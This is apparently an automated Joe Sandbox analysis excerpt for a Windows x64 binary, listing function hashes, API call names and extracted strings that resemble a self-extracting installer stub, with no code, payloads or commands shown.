                                      • Instruction ID: 96e36848103c6ef80afcae487c2441dd894a8b2243e9cff9acafdb154bf8d437
                                      • Opcode Fuzzy Hash: c0c8aba76357acd8a73ae7fdd4341b15dbe5ae0ad7cd8641e383336613531407
                                      • Instruction Fuzzy Hash: 14E2DB22B0868286EB28DB79D5502FD67A1EF49388F4800B6DB5EE7796DF3CE555C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                      • String ID:
                                      • API String ID: 474548282-0
                                      • Opcode ID: 46115452f30c197c0bbe3f06a9c7d7d891456a078a513d98ffa6df2e4323a7a9
                                      • Instruction ID: 1d3354c6bf23262817067e99aafcfce73390ac28793ca9496c55cb71a2786c3d
                                      • Opcode Fuzzy Hash: 46115452f30c197c0bbe3f06a9c7d7d891456a078a513d98ffa6df2e4323a7a9
                                      • Instruction Fuzzy Hash: 8D61B562A0864286DA109F28E94126D6361FF857A8F145371EBBEE37D9DF3CD544C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CMT
                                      • API String ID: 0-2756464174
                                      • Opcode ID: 26aee052e4198fdaa73040eb9262e84a8c472a73f485ca08826947fa9a3fbcb8
                                      • Instruction ID: 8f694b4af9e6893ceb65ef44d0d25a39e2f38714a4bc0f55a5ef340295c0442a
                                      • Opcode Fuzzy Hash: 26aee052e4198fdaa73040eb9262e84a8c472a73f485ca08826947fa9a3fbcb8
                                      • Instruction Fuzzy Hash: AC42BC22B086829AEB18DB78C1512FD67A1EF5934CF4801B6DB5EE3696DF3CE559C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b498f61a73da8f949939d090e5f543a3b819356a7f10811b6f229d37e49463a0
                                      • Instruction ID: c615de115788db80be43de71a14a18368b79605eda81835dee305a5e21cec85a
                                      • Opcode Fuzzy Hash: b498f61a73da8f949939d090e5f543a3b819356a7f10811b6f229d37e49463a0
                                      • Instruction Fuzzy Hash: CBE1D162A082C2CAEF60CF29A4442AD7B90FF4574CF094179DB5EE7A85DE3DF6858704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
                                      • Instruction ID: 7ec22a0c408c48247e3f88d2a4adfce20b5f12e6cc061b045a8b97517e3dcb61
                                      • Opcode Fuzzy Hash: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
                                      • Instruction Fuzzy Hash: 56B1E2A2B05BC992DE58CA66D508BE9A391FB44FC8F488036DE1DAB741DF3CE255C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID:
                                      • API String ID: 3340455307-0
                                      • Opcode ID: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
                                      • Instruction ID: e3901de4ff4d3eeab5f6acfc9eea6cd97de8ca06750aefb406cf2755d62ea866
                                      • Opcode Fuzzy Hash: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
                                      • Instruction Fuzzy Hash: 2441F622F156928AFB68DF21EA1077A2652EF8478CF089034DF5EE7754DE3CE4868744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Control-flow Graph

                                       [Control-flow graph image (legend: Executed / Not Executed) for the function at 7ff65a36df4c. API calls on the graph: GetModuleHandleW, GetProcAddress, CreateFileW, SetFilePointer, ReadFile, CloseHandle, CompareStringW, AllocConsole, GetCurrentProcessId, AttachConsole, GetStdHandle, WriteConsoleW, Sleep, FreeConsole, ExitProcess.]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                      • API String ID: 1496594111-2013832382
                                      • Opcode ID: 5ce2597d7fdccac93bce9593f824b9950da015bd240da865e516934723f6dab5
                                      • Instruction ID: 35b9a223c3644534db0397a9ec65cad224d752e48e304ad4b4664a708fc425c3
                                      • Opcode Fuzzy Hash: 5ce2597d7fdccac93bce9593f824b9950da015bd240da865e516934723f6dab5
                                      • Instruction Fuzzy Hash: 4A322A31A09B8299EB219F64E9411E933A4FF4835CF580276DA4DE77A5EF3CE259C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A368E18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65A368F4D
                                      • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF65A369F35
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A36A3EF
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A36A3F5
                                        • Part of subcall function 00007FF65A370B3C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF65A370AC4), ref: 00007FF65A370B69
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                      • API String ID: 3629253777-3268106645
                                      • Opcode ID: ade189b4b6c588eec8a7f4367c76198bca2ff4dad6effa83c1c8df0ea525dc49
                                      • Instruction ID: 37ffade15db1635ba6069231d02c56e49d10c681d6b463cc9b0f02f7da6ec14a
                                      • Opcode Fuzzy Hash: ade189b4b6c588eec8a7f4367c76198bca2ff4dad6effa83c1c8df0ea525dc49
                                      • Instruction Fuzzy Hash: E862BD22E19A8285EB20DF24E4482BD63A1FF4478CF9851B2DA5DEB795EF3CE545C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Control-flow Graph

                                       [Control-flow graph image (legend: Executed / Not Executed) for the function at 7ff65a381880. API calls on the graph: RaiseException, LoadLibraryExA, GetLastError, FreeLibrary, GetProcAddress.]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                      • String ID: H
                                      • API String ID: 3432403771-2852464175
                                      • Opcode ID: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                      • Instruction ID: 532014fb2a2a4c0899b92d04cb56276a3067135a16f1060857dd3261b01accfa
                                      • Opcode Fuzzy Hash: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                      • Instruction Fuzzy Hash: 1D914622A06B128AEB50CFA5D9846AC73E5FF48B98F494579DE0DE7B54EF38E445C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Control-flow Graph

                                       [Control-flow graph image (legend: Executed / Not Executed) for the function at 7ff65a37f460. API calls on the graph: ShellExecuteExW, ShowWindow, GetExitCodeProcess, CloseHandle.]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                      • String ID: .exe$.inf$Install$p
                                      • API String ID: 1054546013-3607691742
                                      • Opcode ID: 92268ea336dbf51999bc6770023981d3e865bf47c4d02bd932ccc92627bed11e
                                      • Instruction ID: eadc5d76eff9348cf4adeb44222c2e4101917e2fcd23dcc8cded751f397d281f
                                      • Opcode Fuzzy Hash: 92268ea336dbf51999bc6770023981d3e865bf47c4d02bd932ccc92627bed11e
                                      • Instruction Fuzzy Hash: 09C17D62F19A42D5FB10CB25D94027927A2BF85BC8F0841B5DA4DE77A5DF3CE656C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID:
                                      • API String ID: 4119318379-0
                                      • Opcode ID: d034e05cf2ee9d9bbd0f2927dddd7a5f6895878a46b9a51b2d75114531de0697
                                      • Instruction ID: 11f166f08fc1bd8e085ad990259f70cb5848d22017fbd1ecaa52ec2850da5f33
                                      • Opcode Fuzzy Hash: d034e05cf2ee9d9bbd0f2927dddd7a5f6895878a46b9a51b2d75114531de0697
                                      • Instruction Fuzzy Hash: 2C41EE21B14A468AF700CF65E810BAA2761EF89B9CF580275ED0EE7B95CF3DE4498740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c9aeac2a571ab4be581cdbc0b6739a7092aa07dd54f8633a78a72e77e1cc4d8c
                                      • Instruction ID: edf31109be5bc2b32d5e2d4a8c327d54b5dfb46923ccaa5a5dc925032cbb9ec7
                                      • Opcode Fuzzy Hash: c9aeac2a571ab4be581cdbc0b6739a7092aa07dd54f8633a78a72e77e1cc4d8c
                                      • Instruction Fuzzy Hash: C812D062F0974285EB10DBA8D4452AD2372AF497ACF444272DE5CE7AD9DF3CE189C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3536497005-0
                                      • Opcode ID: f99e3521103fb3de9edb0e7f63cc92576d3a0ea263af1d2a6f50a88c27f1a9b4
                                      • Instruction ID: 52a961822a528c64772d017b5ead8b3a734314f3e5c4afe2d3c44a5bf0958b2a
                                      • Opcode Fuzzy Hash: f99e3521103fb3de9edb0e7f63cc92576d3a0ea263af1d2a6f50a88c27f1a9b4
                                      • Instruction Fuzzy Hash: 8961D062E0868186E7208F69E50136E67B1BB857ACF141334DFADA3BE8DF7DD0948740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                      • String ID: ]
                                      • API String ID: 2347093688-3352871620
                                      • Opcode ID: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                      • Instruction ID: 606d868fb4dea18da9979962bb4f92a9e298f2aa936733be8312f687edeb25ce
                                      • Opcode Fuzzy Hash: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                      • Instruction Fuzzy Hash: A011B920F0D746C1FA249B12E6452799692AF88BD8F1C01B4DD0DD7B96DF3CFA448600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                      • Instruction ID: 32fcde97ef90b227d7a94557c3ef328a243209fd51759d4291871e463c44e490
                                      • Opcode Fuzzy Hash: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                      • Instruction Fuzzy Hash: 76F0FF35F3895682FB50DB24E895A762366FFD0709FE85571E54ED1864DF2CD108CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                      • Instruction ID: 08f165eb35bdadb6591337882af09487f5d89be7584bbbde94f67af5d0852395
                                      • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                      • Instruction Fuzzy Hash: 2B01A421F08A4781FE609B21F8157B66395AF99748F5C01B1CD4EE7765EE2CD24DC740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: f75491ea07e48306717d4c7b9b0dd782ca1ca02fd54a3e960da042ac82e522ce
                                      • Instruction ID: 7b4003a7a6f04dda3e89117d86ebfa9c14b8e8e5f745b7829fe1a48531f45674
                                      • Opcode Fuzzy Hash: f75491ea07e48306717d4c7b9b0dd782ca1ca02fd54a3e960da042ac82e522ce
                                      • Instruction Fuzzy Hash: 2351FE62F19A4292FA10CF64E94477A6360FF85B98F480171EA4EE7BA4DF3CE585C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                      • String ID:
                                      • API String ID: 3750147219-0
                                      • Opcode ID: cab5017390b7442ea37a5c88792caa3d5e9d8e3083b53e0f89399461d0983a4c
                                      • Instruction ID: d5b7826e4d2bc4c07a6a8b45468e556a7fdfd584c7b0d5b0d8bb5d2c00fa0bae
                                      • Opcode Fuzzy Hash: cab5017390b7442ea37a5c88792caa3d5e9d8e3083b53e0f89399461d0983a4c
                                      • Instruction Fuzzy Hash: F651B162F29B5284FF009BA5D8452AD2322AF45BA8F5806B6DE2CE7BD5DF6CD540C310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 1452418845-0
                                      • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                      • Instruction ID: d7ef9af30ee8b9c519fee11a7bd79d6913394a6462b48280ec1ffaac1d06ccd4
                                      • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                      • Instruction Fuzzy Hash: 0E315021E0F60746FA54ABA5D5113BA1791AF8138CF5C44F4E96EFB2E7DE2CB5098201
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2359106489-0
                                      • Opcode ID: 2f23f07ec0997a12744607595347009f8296f9e9ca2e1c038d0e8349dad5b5fd
                                      • Instruction ID: 83992dcf34faf0f5f31313ba4ae9d414fa8bc07055c56693b6cb90149278f129
                                      • Opcode Fuzzy Hash: 2f23f07ec0997a12744607595347009f8296f9e9ca2e1c038d0e8349dad5b5fd
                                      • Instruction Fuzzy Hash: 1C31D322E0C78381EA649F29A5852BD6361FF897E8F580271EE9DE37D5DF3CD4418600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                      • Instruction ID: a42ffeee8ace5b841a8b8418c8d8faf32e8fda424e364ed4d09ef4d4e3c32ee1
                                      • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                      • Instruction Fuzzy Hash: 9B218121E0CA5285EB609FA1A40033DA7A0FF45B9CF2D41B1EA9DEB794DF3CE8558741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A36EC58: ResetEvent.KERNEL32 ref: 00007FF65A36EC71
                                        • Part of subcall function 00007FF65A36EC58: ReleaseSemaphore.KERNEL32 ref: 00007FF65A36EC87
                                      • ReleaseSemaphore.KERNEL32 ref: 00007FF65A36E8F0
                                      • FindCloseChangeNotification.KERNELBASE ref: 00007FF65A36E90F
                                      • DeleteCriticalSection.KERNEL32 ref: 00007FF65A36E926
                                      • CloseHandle.KERNEL32 ref: 00007FF65A36E933
                                        • Part of subcall function 00007FF65A36E9D8: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9DF
                                        • Part of subcall function 00007FF65A36E9D8: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9EA
                                      Similarity
                                      • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 2143293610-0
                                      • Opcode ID: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                      • Instruction ID: 54ba38601817bd8216f6d06bf751112c61efae0bac03a98fab5318caa1400898
                                      • Opcode Fuzzy Hash: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                      • Instruction Fuzzy Hash: E9014033A14A91A6E6489F21E6442ADA771FFC4B84F144071DB5EE3721CF39E4B8C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: Thread$CreatePriority
                                      • String ID: CreateThread failed
                                      • API String ID: 2610526550-3849766595
                                      • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                      • Instruction ID: 98be541967887b2eb301a8822dda1d0d0f0d9f627323cd6c1817ab7f42f92dd2
                                      • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                      • Instruction Fuzzy Hash: 5D112B31A19A4686FA00DF14E8411A97361FF84798F5842B1DA4DE3669EF3CE98AC740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: DirectoryInitializeMallocSystem
                                      • String ID: riched20.dll
                                      • API String ID: 174490985-3360196438
                                      • Opcode ID: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
                                      • Instruction ID: f691ba79824897fcac9d998a4b590a207f3cf9a4791a8da7d42d69e1ca2a6cb6
                                      • Opcode Fuzzy Hash: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
                                      • Instruction Fuzzy Hash: E6F06271A18F4682EB409F64F4151AAB7A0FF88758F480275E58ED2764DF7CD14DCB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A3784BC: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF65A3784EC
                                        • Part of subcall function 00007FF65A36AAA0: LoadStringW.USER32 ref: 00007FF65A36AB27
                                        • Part of subcall function 00007FF65A36AAA0: LoadStringW.USER32 ref: 00007FF65A36AB40
                                        • Part of subcall function 00007FF65A351FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A351FFB
                                        • Part of subcall function 00007FF65A35129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65A351396
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A38013B
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A380141
                                      • SendDlgItemMessageW.USER32 ref: 00007FF65A380172
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                      • String ID:
                                      • API String ID: 3106221260-0
